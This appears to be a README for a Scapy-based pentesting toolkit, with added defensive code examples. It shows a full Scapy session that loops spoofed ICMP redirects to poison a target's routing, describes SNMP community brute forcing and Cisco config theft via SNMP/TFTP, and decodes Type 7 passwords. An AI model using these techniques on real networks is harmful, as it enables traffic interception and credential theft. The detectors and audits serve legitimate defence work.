Home
This repository contains some scripts that can be useful for network administration and pentesting. Most of them are written in Python 2 and are based on Scapy.

After gaining access to the network, this script collects the domain information handed out by DHCP:

```
# ./dhcp_discover.py -i wlan0
-I- Sending packet...
-I- Got response :
-I- Source : xx:xx:xx:xx:xx:xx
-I- Destination : xx:xx:xx:xx:xx:xx
-I- message-type : 2
-I- server_id : 192.168.1.1
-I- lease_time : 86043
-I- subnet_mask : 255.255.255.0
-I- router : 192.168.1.1
-I- name_server : 8.8.8.8
-I- domain : P0WN3D
```
This file contains a home-made dissector for CDP (Cisco Discovery Protocol). When run as a script, it sniffs network traffic until a CDP packet is seen, then dissects it and prints the information in a human-readable format:

```
# ./CDP.py
DeviceID: p0wn3d
Port: FastEthernet0/1
VLAN 10
Management Address: 192.168.1.254
```
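To show what such a dissector has to do, here is an added, dependency-free Python 3 example (it is not CDP.py and not part of this repository) that parses the CDP TLVs behind the four fields printed above: Device ID (type 0x0001), Addresses (0x0002), Port ID (0x0003), Native VLAN (0x000A) and Management Address (0x0016). The CDP payload it runs on is constructed inline; the checksum is left at zero because the example does not verify it.

```python
"""Pure-Python dissector for the CDP fields printed by CDP.py (added example, not the repo's code)."""
import struct
from typing import Dict, List

# TLV type codes from the CDP format.
CDP_DEVICE_ID = 0x0001
CDP_ADDRESSES = 0x0002
CDP_PORT_ID = 0x0003
CDP_NATIVE_VLAN = 0x000A
CDP_MGMT_ADDRESS = 0x0016
PROTO_IP = 0xCC  # NLPID used for IPv4 inside a CDP address entry


def _parse_addresses(value: bytes) -> List[str]:
    """Decode an Addresses / Management Address TLV body into dotted-quad strings."""
    (count,) = struct.unpack("!I", value[:4])
    addrs, off = [], 4
    for _ in range(count):
        proto_type, proto_len = value[off], value[off + 1]
        proto = value[off + 2:off + 2 + proto_len]
        off += 2 + proto_len
        (addr_len,) = struct.unpack("!H", value[off:off + 2])
        addr = value[off + 2:off + 2 + addr_len]
        off += 2 + addr_len
        # Only NLPID-encoded IPv4 entries are reported; other protocols are skipped.
        if proto_type == 1 and proto == bytes([PROTO_IP]) and addr_len == 4:
            addrs.append(".".join(str(b) for b in addr))
    return addrs


def dissect_cdp(payload: bytes) -> Dict[str, object]:
    """Parse a CDP payload (the bytes after the SNAP header) into a dict of known fields."""
    version, ttl, _checksum = struct.unpack("!BBH", payload[:4])
    info: Dict[str, object] = {"version": version, "ttl": ttl}
    off = 4
    while off + 4 <= len(payload):
        tlv_type, tlv_len = struct.unpack("!HH", payload[off:off + 4])
        # The length field covers the 4-byte TLV header, so anything below 4 is bogus,
        # and a TLV running past the end of the payload is truncated or hostile.
        if tlv_len < 4 or off + tlv_len > len(payload):
            raise ValueError("malformed CDP TLV at offset %d" % off)
        value = payload[off + 4:off + tlv_len]
        if tlv_type == CDP_DEVICE_ID:
            info["device_id"] = value.decode("ascii", "replace")
        elif tlv_type == CDP_PORT_ID:
            info["port_id"] = value.decode("ascii", "replace")
        elif tlv_type == CDP_NATIVE_VLAN:
            info["native_vlan"] = struct.unpack("!H", value[:2])[0]
        elif tlv_type == CDP_ADDRESSES:
            info["addresses"] = _parse_addresses(value)
        elif tlv_type == CDP_MGMT_ADDRESS:
            info["mgmt_addresses"] = _parse_addresses(value)
        off += tlv_len
    return info


def format_cdp(info: Dict[str, object]) -> str:
    """Render the parsed fields in the same layout CDP.py prints."""
    lines = ["DeviceID: %s" % info.get("device_id", "?"),
             "Port: %s" % info.get("port_id", "?")]
    if "native_vlan" in info:
        lines.append("VLAN %d" % info["native_vlan"])
    for addr in info.get("mgmt_addresses", []):
        lines.append("Management Address: %s" % addr)
    return "\n".join(lines)


# --- constructed sample payload (not a real capture) ---------------------------
def _tlv(tlv_type: int, value: bytes) -> bytes:
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


def _addr_tlv(tlv_type: int, ip: str) -> bytes:
    entry = (bytes([1, 1, PROTO_IP]) + struct.pack("!H", 4)
             + bytes(int(x) for x in ip.split(".")))
    return _tlv(tlv_type, struct.pack("!I", 1) + entry)


SAMPLE_CDP = (struct.pack("!BBH", 2, 180, 0)  # version 2, TTL 180, checksum left 0
              + _tlv(CDP_DEVICE_ID, b"p0wn3d")
              + _addr_tlv(CDP_ADDRESSES, "192.168.1.254")
              + _tlv(CDP_PORT_ID, b"FastEthernet0/1")
              + _tlv(CDP_NATIVE_VLAN, struct.pack("!H", 10))
              + _addr_tlv(CDP_MGMT_ADDRESS, "192.168.1.254"))

if __name__ == "__main__":
    print(format_cdp(dissect_cdp(SAMPLE_CDP)))
```

The length check in `dissect_cdp` matters in practice: a dissector that trusts the TLV length field on sniffed traffic is itself a target, so a truncated or over-long TLV is rejected instead of being read past the buffer.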
This script, based on the snmp_login Metasploit module, brute forces SNMP community names.

First, a series of SNMP GET requests on versionOID is sent to find valid community names. Then each community found is used to read, and write back, nameOID; based on the response status, the community is marked as RW or RO.

```
[+] Community private, version 1, for 192.168.1.254 is RW
[+] Community private, version 2c, for 192.168.1.254 is RW
```
This bash script remotely downloads the configuration file of a Cisco device. The RW community name must be known.

```
./dlCiscoCfg -i eth0 -v 1 -c private 192.168.1.254
-I- Starting tftpd server on 192.168.1.242. Results will be stored in /srv/tftp.
-I- Retrieve 192.168.1.254 configuration in switch-config.txt_192.168.1.254.
-I- SNMP Version: 1
-I- Community: private
SNMPv2-SMI::enterprises.9.2.1.55.192.168.1.242 = STRING: "switch-config.txt_192.168.1.254"
-I- Stopping tftp server.
```

The script starts the HPA TFTP server on the local machine and issues an SNMP request (using snmpset) that makes the remote Cisco device upload its configuration file to the local machine.

Once the configuration is collected, passwords stored in Cisco Type 7 format can be recovered as clear text.
First compile it:

```
gcc -o cisco_type7 cisco_type7.c
```

Then use it to reverse a Cisco Type 7 password:

```
./cisco_type7 01375717585B
C1sc0
```

Note that the tool can also encode a clear-text password in Cisco Type 7 format:

```
./cisco_type7 -e C1sc0
01375717585B
```
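Why Type 7 is reversible at all, as an added Python 3 example (this is not cisco_type7.c from the repository): Type 7 is a fixed XOR stream, the first two decimal digits are the start offset into a public constant key table, and every following hex pair is one password byte XORed with the next key byte. The `find_type7` helper scans a collected config for `password 7` / `key 7` lines, which is the audit a defender wants after such a download. The sample config and the test vector `01305717585B` are constructed for this example; `060506324F41` is the widely published vector for `cisco`.

```python
"""Cisco Type 7 decode/encode and config audit (added example, not the repository's cisco_type7.c)."""
import re
from typing import List, Tuple

# The constant XOR key table used by IOS for Type 7 (public for decades, hence "obfuscation").
XLAT = bytes([0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e,
              0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44,
              0x48, 0x53, 0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36, 0x39,
              0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76, 0x39, 0x38, 0x37, 0x33,
              0x32, 0x35, 0x34, 0x6b, 0x3b, 0x66, 0x67, 0x38, 0x37])


def type7_decode(encoded: str) -> str:
    """Reverse a Type 7 string: two-digit seed, then hex pairs XORed with XLAT[seed + i]."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("not a Type 7 string: %r" % encoded)
    seed = int(encoded[:2], 10)
    data = bytes.fromhex(encoded[2:])  # raises ValueError on non-hex input
    return "".join(chr(b ^ XLAT[(seed + i) % len(XLAT)]) for i, b in enumerate(data))


def type7_encode(clear: str, seed: int = 0) -> str:
    """Produce a Type 7 string; IOS itself picks seeds in 0..15, so the same range is enforced."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be in 0..15")
    body = "".join("%02X" % (ord(c) ^ XLAT[(seed + i) % len(XLAT)]) for i, c in enumerate(clear))
    return "%02d%s" % (seed, body)


# Lines such as "enable password 7 ...", "username x password 7 ...", "tacacs-server key 7 ...".
_TYPE7_LINE = re.compile(r"\b(?:password|key(?:-string)?)\s+7\s+([0-9A-Fa-f]{4,})")


def find_type7(config_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, encoded, decoded) for every Type 7 secret in a running-config."""
    hits = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        m = _TYPE7_LINE.search(line)
        if m:
            hits.append((lineno, m.group(1), type7_decode(m.group(1))))
    return hits


# Constructed sample configuration (not a real device's config).
SAMPLE_CONFIG = """\
hostname switch
enable password 7 01305717585B
username admin privilege 15 password 7 060506324F41
snmp-server community private RW
"""

if __name__ == "__main__":
    for lineno, enc, dec in find_type7(SAMPLE_CONFIG):
        print("line %d: %s -> %s" % (lineno, enc, dec))
```

The audit output is the practical point: any `password 7` line in a config that leaves the device (TFTP, backups, tickets, pastes) is effectively clear text, so such configs should be treated as containing plaintext credentials and the accounts rotated. Type 7 is only meant to stop casual reading of a config on screen; `enable secret` with a modern hash type is the real protection.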
This script performs ICMP redirect attacks: it sends ICMP redirect packets on behalf of the gateway. The script refuses to run if packet forwarding is disabled.

```
# ./ICMPRedirect.py -g 192.168.1.254 -t 192.168.252
-E- Forwarding deactivated. Please enable it: sudo sysctl -w net.ipv4.ip_forward=1
# sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
```

The -v option displays the Scapy code (nice to put in a pentest report :) )
```
>>> gw = '192.168.1.254'
>>> target = '192.168.252'
>>> ip = IP()
>>> ip.src = gw
>>> ip.dst = target
>>> ip.show2()
###[ IP ]###
  version   = 4L
  ihl       = 5L
  tos       = 0x0
  len       = 20
  id        = 1
  flags     =
  frag      = 0L
  ttl       = 64
  proto     = ip
  chksum    = 0xf69e
  src       = 192.168.1.254
  dst       = 192.168.0.252
  \options   \
>>> icmp = ICMP()
>>> icmp.type = 5
>>> icmp.code = 1
>>> icmp.gw = get_if_addr(iface)
>>> icmp.show2()
###[ ICMP ]###
  type      = redirect
  code      = host-redirect
  chksum    = 0x388e
  gw        = 192.168.1.200
>>> ip2 = IP()
>>> ip2.src = target
>>> ip2.dst = gw
>>> ip2.show()
###[ IP ]###
  version   = 4L
  ihl       = 5L
  tos       = 0x0
  len       = 20
  id        = 1
  flags     =
  frag      = 0L
  ttl       = 64
  proto     = ip
  chksum    = 0xf69e
  src       = 192.168.0.252
  dst       = 192.168.1.254
  \options   \
>>> send(ip/icmp/ip2/UDP(), loop=1, inter=2)
-I- Start poisonning...
...^C
-I- Ended poison
```
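The Scapy session above shows what the packet looks like on the wire: an ICMP type 5 / code 1 from the gateway's address, advertising the attacker's address as the new next hop, with the victim-to-gateway header embedded. The following added Python 3 example (a defender-side detector, not part of the repository, and independent of Scapy) parses raw IPv4 packets and flags redirects that advertise a next hop outside the list of known routers or that redirect an on-link destination; both conditions hold for the packet built in the session above. The packets it runs on are constructed inline with zero checksums; the alert rules are an assumed policy for a single-subnet LAN.

```python
"""Detect suspicious ICMP redirects in raw IPv4 packets (added example, not the repository's code)."""
import ipaddress
import struct
from typing import Dict, Iterable, List, Optional

ICMP_REDIRECT = 5
PROTO_ICMP, PROTO_UDP = 1, 17


def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Build a minimal IPv4 header (checksum 0) in front of payload; used for constructed samples."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr + payload


def parse_redirect(packet: bytes) -> Optional[Dict[str, object]]:
    """Return the fields of an ICMP redirect, or None if the packet is not one."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    # ICMP header (8 bytes) plus the embedded original IP header (>= 20 bytes) must be present.
    if packet[9] != PROTO_ICMP or len(packet) < ihl + 8 + 20:
        return None
    if packet[ihl] != ICMP_REDIRECT:
        return None
    inner = packet[ihl + 8:]
    return {
        "src": str(ipaddress.IPv4Address(packet[12:16])),
        "code": packet[ihl + 1],
        "new_gateway": str(ipaddress.IPv4Address(packet[ihl + 4:ihl + 8])),
        "for_destination": str(ipaddress.IPv4Address(inner[16:20])),
    }


def classify_redirect(packet: bytes, known_routers: Iterable[str],
                      local_net: str) -> Optional[List[str]]:
    """None if not a redirect; otherwise the list of reasons it is suspicious (empty = benign).

    Assumed policy: a redirect may only point at a router we know, and there is never a reason
    to redirect traffic for a destination that is on the local subnet.
    """
    r = parse_redirect(packet)
    if r is None:
        return None
    net = ipaddress.IPv4Network(local_net)
    reasons = []
    if r["new_gateway"] not in set(known_routers):
        reasons.append("advertises unknown next hop %s" % r["new_gateway"])
    if ipaddress.IPv4Address(r["for_destination"]) in net:
        reasons.append("redirects on-link destination %s" % r["for_destination"])
    return reasons


# --- constructed sample traffic (no real capture) -------------------------------
def _redirect(src: str, dst: str, new_gw: str, inner_src: str, inner_dst: str) -> bytes:
    inner = _ipv4(inner_src, inner_dst, PROTO_UDP, struct.pack("!HHHH", 40000, 53, 8, 0))
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, 1, 0, ipaddress.IPv4Address(new_gw).packed)
    return _ipv4(src, dst, PROTO_ICMP, icmp + inner)


# Shape of the packet from the Scapy session: "gateway" tells the victim to reach the gateway
# itself via 192.168.1.200.
SUSPICIOUS = _redirect("192.168.1.254", "192.168.1.10", "192.168.1.200",
                       "192.168.1.10", "192.168.1.254")
# A redirect to a second known router for a remote destination.
BENIGN = _redirect("192.168.1.254", "192.168.1.10", "192.168.1.253",
                   "192.168.1.10", "10.20.0.5")
# Ordinary DNS query, not ICMP at all.
NOT_ICMP = _ipv4("192.168.1.10", "8.8.8.8", PROTO_UDP, struct.pack("!HHHH", 40000, 53, 8, 0))

KNOWN_ROUTERS = {"192.168.1.254", "192.168.1.253"}

if __name__ == "__main__":
    for name, pkt in (("suspicious", SUSPICIOUS), ("benign", BENIGN), ("not_icmp", NOT_ICMP)):
        print(name, classify_redirect(pkt, KNOWN_ROUTERS, "192.168.1.0/24"))
```

On the host side the mitigation is simpler than detection: with `net.ipv4.conf.all.accept_redirects=0` (and `secure_redirects`/`send_redirects` set to taste) a Linux host ignores redirects entirely, and most switches can drop spoofed gateway traffic at the edge with IP source guard or similar features.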